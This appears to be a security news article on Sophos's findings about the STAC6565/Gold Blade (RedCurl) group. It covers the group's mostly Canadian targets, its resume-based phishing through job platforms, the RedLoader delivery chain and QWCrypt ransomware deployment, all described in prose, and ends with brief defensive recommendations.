Canadian Targets Dominated by Gold Blade’s QWCrypt Ransomware in Recent Attacks

Canadian Organizations Targeted by Cyber Campaign Linked to STAC6565

A recent cyber campaign targeting Canadian organizations has been attributed to a threat activity cluster known as STAC6565. Cybersecurity firm Sophos has investigated nearly 40 intrusions associated with this threat actor between February 2024 and August 2025. The campaign is believed to have connections with a hacking group called Gold Blade, also known as Earth Kapre, RedCurl, and Red Wolf.

Initially focused on entities in Russia, STAC6565 has expanded its targets to include organizations in Canada, Germany, Norway, Slovenia, Ukraine, the U.K., and the U.S. The group is financially motivated and has a history of using phishing emails for commercial espionage.

Recent attacks by RedCurl, a subgroup of Gold Blade, have involved ransomware attacks using a custom malware strain named QWCrypt. One of the key tools used by the threat actor is RedLoader, which communicates with a command-and-control (C2) server to gather information about the compromised Active Directory (AD) environment.

According to Sophos researcher Morgan Demboski, the focus of the campaign on Canadian organizations is unusual, with nearly 80% of the attacks targeting entities in Canada. Gold Blade has transitioned from cyber espionage to a hybrid operation involving data theft and selective ransomware deployment through QWCrypt.

Aside from Canada, the U.S., Australia, and the U.K. have also been targeted, with sectors such as services, manufacturing, retail, technology, non-governmental organizations, and transportation being the most affected.

Operating Model and Tactics of STAC6565

The group operates under a “hack-for-hire” model, conducting tailored intrusions for clients while also deploying ransomware to monetize the attacks. Despite speculations about being a Russian-speaking group, there is currently no definitive evidence to support this claim.

Sophos describes RedCurl as a sophisticated operation that continually refines its techniques and conducts discreet extortion attacks. However, there is no indication that the group is state-sponsored or politically motivated. The operational tempo of the group involves periods of inactivity followed by sudden spikes in attacks, indicating strategic toolset refreshment during downtime.

STAC6565 initiates its attacks through spear-phishing emails targeting HR personnel, using malicious documents disguised as resumes or cover letters. The group has leveraged legitimate job search platforms like Indeed, JazzHR, and ADP WorkforceNow to upload weaponized resumes as part of the application process since at least November 2024.

This tactic increases the likelihood of document opening and evades email-based detection mechanisms. In one instance, a fake resume on Indeed redirected users to a booby-trapped URL leading to the deployment of QWCrypt ransomware via a RedLoader chain.

Delivery Methods and Malware Deployment

The attack chain involves a ZIP archive dropped by the fake resume containing a Windows shortcut (LNK) that fetches a renamed version of “ADNotificationManager.exe” from a WebDAV server. This executable sideloads the RedLoader DLL, which connects to an external server to download and execute the second-stage payload responsible for retrieving malicious files.

The attackers utilize Microsoft’s Program Compatibility Assistant for payload execution, transitioning to EXE files from DLLs in April 2025. The payload connects to a C2 server, gathers system details, and transfers encrypted data to the attacker-controlled server. Additional tools such as RPivot and Chisel SOCKS5 are used for C2 communications.

RedCurl employs a customized version of the Terminator tool to kill antivirus processes using a signed Zemana AntiMalware driver. The attacks are tailored to the target environment, with deployment scripts containing victim-specific IDs. Sophos noted that most attacks were detected and mitigated before QWCrypt installation, but some incidents led to successful ransomware deployment.

Impact and Recommendations

The deployment scripts disable recovery mechanisms and execute ransomware on endpoint devices, including hypervisors, across the network. Cleanup scripts are run to delete shadow copies and PowerShell console history files to hinder forensic recovery.

Sophos emphasizes that Gold Blade’s maturity in operations, including abuse of recruitment platforms and continual refinement of delivery methods, sets it apart from typical financially motivated threat actors. As ransomware attacks on hypervisors increase, it is recommended to implement security measures such as multi-factor authentication, strong password policies, and network segregation.

The rise in hypervisor-targeted attacks underscores the need for enhanced security practices to mitigate the impact of intrusion by threat actors.